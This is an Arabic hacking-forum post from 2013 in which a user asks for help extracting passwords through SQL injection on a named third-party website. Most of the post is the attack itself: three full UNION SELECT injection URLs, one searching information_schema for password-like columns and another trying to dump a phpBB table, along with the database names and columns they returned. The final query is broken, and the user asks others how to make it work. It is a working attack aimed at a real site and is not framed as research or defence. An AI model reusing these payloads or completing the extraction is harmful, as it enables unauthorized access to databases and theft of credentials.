:: vBspiders Professional Network :: - عرض مشاركة واحدة - [حل مشكلة] عندي مشكلة sql injection plz klashinkov

lifemaker · 10-07-2013, 09:37 AM

عندي مشكلة ستخراج البس
وهدا ااستغلال ممكن تساعدني

http://blamm.com/top10.php?id=-8 UNION SELECT 1,2,3,concat(table_name,0x3a,column_name,0x3a,tabl e_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47+from+information _schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)--
===================
نتيجة
phpbb_bbcodes:first_pass_match:db9330_angel34
=====
بعدين

http://blamm.com/top10.php?id=-8 UNION SELECT 1,2,3,concat(table_name,0x3a,column_name,0x3a,tabl e_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47+from+information _schema.columns+where+table_name=0x70687062625f626 2636f646573--
نتيجة
phpbb_bbcodes:bbcode_id:db9330_angel34------user :bbcode_id

المشكل

http://blamm.com/top10.php?id=-8 UNION SELECT 1,2,3,concat(bbcode_id,0x3a,cfirst_pass_match),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47+from+phpbb_bbcodes --

ماهو الحل

وشكرا

المصدر: :: vBspiders Professional Network ::

uk]d la;gm sql injection plz klashinkov